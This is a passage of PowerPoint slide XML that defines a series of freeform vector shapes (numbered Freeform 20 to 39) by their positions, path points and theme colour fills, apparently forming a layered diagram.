                  <a:gd name="T5" fmla="*/ 61 h 61"/>
                  <a:gd name="T6" fmla="*/ 0 w 545"/>
                  <a:gd name="T7" fmla="*/ 39 h 61"/>
                  <a:gd name="T8" fmla="*/ 201 w 545"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 201 w 545"/>
                  <a:gd name="T1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5" h="61">
                    <a:moveTo>
                      <a:pt x="201" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="545" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0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" name="Freeform 20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5453207" y="3363473"/>
                <a:ext cx="1541823" cy="61617"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 376 w 1101"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 1101 w 1101"/>
                  <a:gd name="T3" fmla="*/ 18 h 44"/>
                  <a:gd name="T4" fmla="*/ 674 w 1101"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 0 w 1101"/>
                  <a:gd name="T7" fmla="*/ 29 h 44"/>
                  <a:gd name="T8" fmla="*/ 376 w 1101"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 376 w 1101"/>
                  <a:gd name="T1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01" h="44">
                    <a:moveTo>
                      <a:pt x="376" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1101" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="674" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="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" name="Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5453207" y="2754302"/>
                <a:ext cx="616169" cy="649782"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 376 w 440"/>
                  <a:gd name="T1" fmla="*/ 435 h 464"/>
                  <a:gd name="T2" fmla="*/ 440 w 440"/>
                  <a:gd name="T3" fmla="*/ 0 h 464"/>
                  <a:gd name="T4" fmla="*/ 199 w 440"/>
                  <a:gd name="T5" fmla="*/ 48 h 464"/>
                  <a:gd name="T6" fmla="*/ 0 w 440"/>
                  <a:gd name="T7" fmla="*/ 464 h 464"/>
                  <a:gd name="T8" fmla="*/ 376 w 440"/>
                  <a:gd name="T9" fmla="*/ 435 h 464"/>
                  <a:gd name="T10" fmla="*/ 376 w 440"/>
                  <a:gd name="T11" fmla="*/ 435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0" h="464">
                    <a:moveTo>
                      <a:pt x="376" y="435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="440" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="435"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:cu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" name="Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5509223" y="2797714"/>
                <a:ext cx="519543" cy="568559"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 177 w 371"/>
                  <a:gd name="T1" fmla="*/ 38 h 406"/>
                  <a:gd name="T2" fmla="*/ 371 w 371"/>
                  <a:gd name="T3" fmla="*/ 0 h 406"/>
                  <a:gd name="T4" fmla="*/ 315 w 371"/>
                  <a:gd name="T5" fmla="*/ 381 h 406"/>
                  <a:gd name="T6" fmla="*/ 0 w 371"/>
                  <a:gd name="T7" fmla="*/ 406 h 406"/>
                  <a:gd name="T8" fmla="*/ 177 w 371"/>
                  <a:gd name="T9" fmla="*/ 38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1" h="406">
                    <a:moveTo>
                      <a:pt x="177" y="38"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="371" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="38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" name="Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5979752" y="2754302"/>
                <a:ext cx="1015279" cy="634378"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 725"/>
                  <a:gd name="T1" fmla="*/ 435 h 453"/>
                  <a:gd name="T2" fmla="*/ 64 w 725"/>
                  <a:gd name="T3" fmla="*/ 0 h 453"/>
                  <a:gd name="T4" fmla="*/ 507 w 725"/>
                  <a:gd name="T5" fmla="*/ 30 h 453"/>
                  <a:gd name="T6" fmla="*/ 725 w 725"/>
                  <a:gd name="T7" fmla="*/ 453 h 453"/>
                  <a:gd name="T8" fmla="*/ 0 w 725"/>
                  <a:gd name="T9" fmla="*/ 435 h 453"/>
                  <a:gd name="T10" fmla="*/ 0 w 725"/>
                  <a:gd name="T11" fmla="*/ 435 h 4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5" h="453">
                    <a:moveTo>
                      <a:pt x="0" y="435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="64" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="435"/>
                    </a:ln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" name="Freeform 24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6017562" y="2792113"/>
                <a:ext cx="920053" cy="561557"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 657"/>
                  <a:gd name="T1" fmla="*/ 384 h 401"/>
                  <a:gd name="T2" fmla="*/ 57 w 657"/>
                  <a:gd name="T3" fmla="*/ 0 h 401"/>
                  <a:gd name="T4" fmla="*/ 465 w 657"/>
                  <a:gd name="T5" fmla="*/ 26 h 401"/>
                  <a:gd name="T6" fmla="*/ 657 w 657"/>
                  <a:gd name="T7" fmla="*/ 401 h 401"/>
                  <a:gd name="T8" fmla="*/ 0 w 657"/>
                  <a:gd name="T9" fmla="*/ 384 h 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7" h="401">
                    <a:moveTo>
                      <a:pt x="0" y="384"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="384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" name="Freeform 25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5096109" y="3544123"/>
                <a:ext cx="857035" cy="662385"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 541 w 612"/>
                  <a:gd name="T1" fmla="*/ 473 h 473"/>
                  <a:gd name="T2" fmla="*/ 612 w 612"/>
                  <a:gd name="T3" fmla="*/ 0 h 473"/>
                  <a:gd name="T4" fmla="*/ 195 w 612"/>
                  <a:gd name="T5" fmla="*/ 17 h 473"/>
                  <a:gd name="T6" fmla="*/ 0 w 612"/>
                  <a:gd name="T7" fmla="*/ 422 h 473"/>
                  <a:gd name="T8" fmla="*/ 541 w 612"/>
                  <a:gd name="T9" fmla="*/ 473 h 473"/>
                  <a:gd name="T10" fmla="*/ 541 w 612"/>
                  <a:gd name="T11" fmla="*/ 473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2" h="473">
                    <a:moveTo>
                      <a:pt x="541" y="473"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="612" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="473"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3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" name="Freeform 26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5146523" y="3579133"/>
                <a:ext cx="767411" cy="592366"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 548"/>
                  <a:gd name="T1" fmla="*/ 376 h 423"/>
                  <a:gd name="T2" fmla="*/ 175 w 548"/>
                  <a:gd name="T3" fmla="*/ 16 h 423"/>
                  <a:gd name="T4" fmla="*/ 548 w 548"/>
                  <a:gd name="T5" fmla="*/ 0 h 423"/>
                  <a:gd name="T6" fmla="*/ 485 w 548"/>
                  <a:gd name="T7" fmla="*/ 423 h 423"/>
                  <a:gd name="T8" fmla="*/ 0 w 548"/>
                  <a:gd name="T9" fmla="*/ 376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8" h="423">
                    <a:moveTo>
                      <a:pt x="0" y="376"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="376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" name="Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5853717" y="3544123"/>
                <a:ext cx="1539023" cy="662385"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1099"/>
                  <a:gd name="T1" fmla="*/ 473 h 473"/>
                  <a:gd name="T2" fmla="*/ 71 w 1099"/>
                  <a:gd name="T3" fmla="*/ 0 h 473"/>
                  <a:gd name="T4" fmla="*/ 878 w 1099"/>
                  <a:gd name="T5" fmla="*/ 11 h 473"/>
                  <a:gd name="T6" fmla="*/ 1099 w 1099"/>
                  <a:gd name="T7" fmla="*/ 440 h 473"/>
                  <a:gd name="T8" fmla="*/ 0 w 1099"/>
                  <a:gd name="T9" fmla="*/ 473 h 473"/>
                  <a:gd name="T10" fmla="*/ 0 w 1099"/>
                  <a:gd name="T11" fmla="*/ 473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99" h="473">
                    <a:moveTo>
                      <a:pt x="0" y="473"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="71" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="473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" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5892928" y="3577733"/>
                <a:ext cx="1445197" cy="595167"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 1032"/>
                  <a:gd name="T1" fmla="*/ 0 h 425"/>
                  <a:gd name="T2" fmla="*/ 835 w 1032"/>
                  <a:gd name="T3" fmla="*/ 11 h 425"/>
                  <a:gd name="T4" fmla="*/ 1032 w 1032"/>
                  <a:gd name="T5" fmla="*/ 393 h 425"/>
                  <a:gd name="T6" fmla="*/ 0 w 1032"/>
                  <a:gd name="T7" fmla="*/ 425 h 425"/>
                  <a:gd name="T8" fmla="*/ 64 w 1032"/>
                  <a:gd name="T9" fmla="*/ 0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2" h="425">
                    <a:moveTo>
                      <a:pt x="64" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="835" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1032" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="425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" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5019088" y="4244319"/>
                <a:ext cx="2457675" cy="161045"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1755"/>
                  <a:gd name="T1" fmla="*/ 36 h 115"/>
                  <a:gd name="T2" fmla="*/ 1052 w 1755"/>
                  <a:gd name="T3" fmla="*/ 0 h 115"/>
                  <a:gd name="T4" fmla="*/ 1755 w 1755"/>
                  <a:gd name="T5" fmla="*/ 64 h 115"/>
                  <a:gd name="T6" fmla="*/ 576 w 1755"/>
                  <a:gd name="T7" fmla="*/ 115 h 115"/>
                  <a:gd name="T8" fmla="*/ 0 w 1755"/>
                  <a:gd name="T9" fmla="*/ 36 h 115"/>
                  <a:gd name="T10" fmla="*/ 0 w 1755"/>
                  <a:gd name="T11" fmla="*/ 36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55" h="115">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1052" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1755" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36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" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4747414" y="4294733"/>
                <a:ext cx="1078296" cy="838835"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 194 w 770"/>
                  <a:gd name="T1" fmla="*/ 0 h 599"/>
                  <a:gd name="T2" fmla="*/ 770 w 770"/>
                  <a:gd name="T3" fmla="*/ 79 h 599"/>
                  <a:gd name="T4" fmla="*/ 692 w 770"/>
                  <a:gd name="T5" fmla="*/ 599 h 599"/>
                  <a:gd name="T6" fmla="*/ 0 w 770"/>
                  <a:gd name="T7" fmla="*/ 394 h 599"/>
                  <a:gd name="T8" fmla="*/ 194 w 770"/>
                  <a:gd name="T9" fmla="*/ 0 h 599"/>
                  <a:gd name="T10" fmla="*/ 194 w 770"/>
                  <a:gd name="T11" fmla="*/ 0 h 5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70" h="599">
                    <a:moveTo>
                      <a:pt x="194" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="770" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="0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chemeClr val="accent2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" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4796427" y="4331144"/>
                <a:ext cx="990072" cy="759013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 707"/>
                  <a:gd name="T1" fmla="*/ 353 h 542"/>
                  <a:gd name="T2" fmla="*/ 173 w 707"/>
                  <a:gd name="T3" fmla="*/ 0 h 542"/>
                  <a:gd name="T4" fmla="*/ 707 w 707"/>
                  <a:gd name="T5" fmla="*/ 74 h 542"/>
                  <a:gd name="T6" fmla="*/ 637 w 707"/>
                  <a:gd name="T7" fmla="*/ 542 h 542"/>
                  <a:gd name="T8" fmla="*/ 0 w 707"/>
                  <a:gd name="T9" fmla="*/ 353 h 5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7" h="542">
                    <a:moveTo>
                      <a:pt x="0" y="353"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="173" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="542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" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5716480" y="4333944"/>
                <a:ext cx="2078171" cy="799624"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1388 w 1638"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 86 w 1638"/>
                  <a:gd name="T3" fmla="*/ 56 h 630"/>
                  <a:gd name="T4" fmla="*/ 0 w 1638"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 1638 w 1638"/>
                  <a:gd name="T7" fmla="*/ 481 h 630"/>
                  <a:gd name="T8" fmla="*/ 1388 w 1638"/>
                  <a:gd name="T9" fmla="*/ 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38" h="630">
                    <a:moveTo>
                      <a:pt x="1388" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="56"/>
                      <a:pt x="86" y="56"/>
                      <a:pt x="86" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="630"/>
                      <a:pt x="0" y="630"/>
                      <a:pt x="0" y="630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1427" y="500"/>
                      <a:pt x="1091" y="531"/>
                      <a:pt x="1638" y="481"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1388" y="0"/>
                      <a:pt x="1388" y="0"/>
                      <a:pt x="1388" y="0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" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5755691" y="4367554"/>
                <a:ext cx="1985745" cy="729604"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 78 w 1565"/>
                  <a:gd name="T1" fmla="*/ 55 h 574"/>
                  <a:gd name="T2" fmla="*/ 1341 w 1565"/>
                  <a:gd name="T3" fmla="*/ 0 h 574"/>
                  <a:gd name="T4" fmla="*/ 1565 w 1565"/>
                  <a:gd name="T5" fmla="*/ 431 h 574"/>
                  <a:gd name="T6" fmla="*/ 1427 w 1565"/>
                  <a:gd name="T7" fmla="*/ 443 h 574"/>
                  <a:gd name="T8" fmla="*/ 608 w 1565"/>
                  <a:gd name="T9" fmla="*/ 518 h 574"/>
                  <a:gd name="T10" fmla="*/ 0 w 1565"/>
                  <a:gd name="T11" fmla="*/ 574 h 574"/>
                  <a:gd name="T12" fmla="*/ 78 w 1565"/>
                  <a:gd name="T13" fmla="*/ 55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65" h="574">
                    <a:moveTo>
                      <a:pt x="78" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1341" y="0"/>
                      <a:pt x="1341" y="0"/>
                      <a:pt x="1341" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1565" y="431"/>
                      <a:pt x="1565" y="431"/>
                      <a:pt x="1565" y="431"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1427" y="443"/>
                      <a:pt x="1427" y="443"/>
                      <a:pt x="1427" y="443"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1184" y="466"/>
                      <a:pt x="1184" y="466"/>
                      <a:pt x="608" y="518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="574"/>
                      <a:pt x="0" y="574"/>
                      <a:pt x="0" y="574"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="78" y="5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" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4673193" y="4964121"/>
                <a:ext cx="3211082" cy="389309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 337 w 2293"/>
                  <a:gd name="T1" fmla="*/ 0 h 278"/>
                  <a:gd name="T2" fmla="*/ 0 w 2293"/>
                  <a:gd name="T3" fmla="*/ 27 h 278"/>
                  <a:gd name="T4" fmla="*/ 723 w 2293"/>
                  <a:gd name="T5" fmla="*/ 278 h 278"/>
                  <a:gd name="T6" fmla="*/ 2293 w 2293"/>
                  <a:gd name="T7" fmla="*/ 111 h 278"/>
                  <a:gd name="T8" fmla="*/ 1846 w 2293"/>
                  <a:gd name="T9" fmla="*/ 20 h 278"/>
                  <a:gd name="T10" fmla="*/ 745 w 2293"/>
                  <a:gd name="T11" fmla="*/ 121 h 278"/>
                  <a:gd name="T12" fmla="*/ 337 w 2293"/>
                  <a:gd name="T13" fmla="*/ 0 h 278"/>
                  <a:gd name="T14" fmla="*/ 337 w 2293"/>
                  <a:gd name="T15" fmla="*/ 0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93" h="278">
                    <a:moveTo>
                      <a:pt x="337" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2293" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1846" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="0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" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4429526" y="5001931"/>
                <a:ext cx="1256145" cy="1095107"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 174 w 897"/>
                  <a:gd name="T1" fmla="*/ 0 h 782"/>
                  <a:gd name="T2" fmla="*/ 165 w 897"/>
                  <a:gd name="T3" fmla="*/ 18 h 782"/>
                  <a:gd name="T4" fmla="*/ 0 w 897"/>
                  <a:gd name="T5" fmla="*/ 357 h 782"/>
                  <a:gd name="T6" fmla="*/ 817 w 897"/>
                  <a:gd name="T7" fmla="*/ 782 h 782"/>
                  <a:gd name="T8" fmla="*/ 897 w 897"/>
                  <a:gd name="T9" fmla="*/ 251 h 782"/>
                  <a:gd name="T10" fmla="*/ 174 w 897"/>
                  <a:gd name="T11" fmla="*/ 0 h 782"/>
                  <a:gd name="T12" fmla="*/ 174 w 897"/>
                  <a:gd name="T13" fmla="*/ 0 h 7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7" h="782">
                    <a:moveTo>
                      <a:pt x="174" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="165" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="817" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="897" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="0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" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4474339" y="5043943"/>
                <a:ext cx="1173522" cy="1002681"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 838"/>
                  <a:gd name="T1" fmla="*/ 317 h 716"/>
                  <a:gd name="T2" fmla="*/ 154 w 838"/>
                  <a:gd name="T3" fmla="*/ 0 h 716"/>
                  <a:gd name="T4" fmla="*/ 838 w 838"/>
                  <a:gd name="T5" fmla="*/ 236 h 716"/>
                  <a:gd name="T6" fmla="*/ 766 w 838"/>
                  <a:gd name="T7" fmla="*/ 716 h 716"/>
                  <a:gd name="T8" fmla="*/ 0 w 838"/>
                  <a:gd name="T9" fmla="*/ 317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8" h="716">
                    <a:moveTo>
                      <a:pt x="0" y="317"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="154" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="317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" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5573641" y="5119564"/>
                <a:ext cx="2608916" cy="977474"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T1" fmla="*/ 0 h 698"/>
                  <a:gd name="T2" fmla="*/ 80 w 1863"/>
                  <a:gd name="T3" fmla="*/ 167 h 698"/>
                  <a:gd name="T4" fmla="*/ 0 w 1863"/>
                  <a:gd name="T5" fmla="*/ 698 h 698"/>
                  <a:gd name="T6" fmla="*/ 1863 w 1863"/>
                  <a:gd name="T7" fmla="*/ 411 h 698"/>
                  <a:gd name="T8" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T9" fmla="*/ 0 h 698"/>
                  <a:gd name="T10" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T11" fmla="*/ 0 h 6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63" h="698">
                    <a:moveTo>
                      <a:pt x="1650" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="80" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1863" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1650" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1650" y="0"/>
                    </a:ln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" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5614252" y="5155975"/>
                <a:ext cx="2516491" cy="901853"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 72 w 1797"/>
                  <a:gd name="T1" fmla="*/ 163 h 644"/>
                  <a:gd name="T2" fmla="*/ 1607 w 1797"/>
                  <a:gd name="T3" fmla="*/ 0 h 644"/>
                  <a:gd name="T4" fmla="*/ 1797 w 1797"/>
                  <a:gd name="T5" fmla="*/ 367 h 644"/>
                  <a:gd name="T6" fmla="*/ 0 w 1797"/>
                  <a:gd name="T7" fmla="*/ 644 h 644"/>
                  <a:gd name="T8" fmla="*/ 72 w 1797"/>
                  <a:gd name="T9" fmla="*/ 163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97" h="644">
                    <a:moveTo>
                      <a:pt x="72" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1607" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1797" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="163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19" name="Freeform 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC45329F-9B8C-4021-BAD4-370ED5EA1C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21236" y="2193331"/>
              <a:ext cx="138638" cy="245069"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 110"/>
                <a:gd name="T1" fmla="*/ 117 h 194"/>
